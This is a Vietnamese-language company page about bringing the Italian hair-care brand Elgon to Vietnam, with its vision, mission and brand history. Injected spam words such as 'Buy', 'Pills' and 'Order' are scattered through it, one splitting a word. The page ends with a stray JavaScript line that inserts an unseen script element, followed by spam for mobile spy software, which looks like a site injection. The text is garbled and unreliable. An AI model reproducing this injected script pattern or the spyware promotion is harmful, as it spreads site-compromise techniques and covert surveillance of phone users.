Perfect Beauty Company

Với nhiều năm kinh nghiệm trong lĩnh vực dịch vụ thẩm mỹ và chăm sóc sắc đẹp, đội ngũ sáng lập của công ty TNHH TM & DV Vẻ Đẹp Hoàn Mỹ đã quyết định đưa thương hiệu mỹ phẩm chăm sóc tóc Elgon vào Việt Nam nhằm thỏa mãn nhu cầu chăm sóc mái tóc một cách chuyên nghiệp cho người Việt.

Buy

Tầm nhìn

Chúng tôi tin rằng vẻ đẹp – luôn đi cùng cảm xúc Pills là một giá trị bất biến với thời gian: mọi phụ nữ, bất kể chủng tộc, văn hóa nào cũng luôn mong muốn được xinh đẹp.

Nghệ sĩ Italy luôn sử dụng màu sắc và thơ ca để ghi lại những kỷ niệm đẹp, và nhà tạo mẫu tóc là một nghệ sĩ đương đại đưa lại những vẻ đẹp đó cho phụ nữ.

Một người thường nói hãy nhẹ nhàng trong một thế giới ồn ào, chúng tôi âm thầm giúp tóc từ mọi nơi, đánh thức vẻ đẹp của tóc, thông qua việc luôn đổi mới, gia tăng chất lượng, sản phẩm và dịch vụ của mình.

Sứ mệnh

Giúp các nhà tạo mẫu tóc chuyên nghiệp trên toàn thế giới sáng tạo ra vẻ đẹp và truyền đạt cảm xúc, thông qua các sản phẩm mỹ phẩm chuyên nghiệp hiệu quả, với một hình ảnh tinh tế đầy cảm hứng.

Lịch sử Elgon

online

Trong hơn 40 năm phát triển, Elgon đã hợp tác với rất nhiều nhà tạo mẫu tóc danh tiếng và tin vào sức mạnh của vẻ đẹp, sức mạnh sáng tạo trong công việc của họ. Elgon được thành lập vào năm 1970 tại Milan, là cái nôi của thời trang và phong cách, dựa trên tài năng và kinh nghiệm của người sáng lập trong lĩnh vực mỹ phẩm chuyên nghiệp.

Elgon phát triển thông qua việc tạo ra và sản xuất màu nhuộm hiệu quả, tinh tế, dễ chịu cho tóc, cũng như cung cấp các phương pháp đào tạo cụ thể để salon tiếp cận khách hàng, giúp họ tăng cường vẻ đẹp.

Ngày nay Elgon có một mặt tại hơn 70 quốc gia và sở hữu một Học viện đào tạo tiên tiến Purchase ở Florence.

Elgon vô cùng tự hào khi lựa chọn công ty Vẻ Đẹp Hoàn M Order ỹ để đưa những sản phẩm tốt nhất vào Việt Nam, một đất nước có vẻ đẹp tinh tế đến từ những người phụ nữ.

document.currentScript.parentNode.insertBefore(s, document.currentScript);The most popular 2017 spy software applications for the mobile phones. Pills Purchase android spy, 1topspy, phone call tracker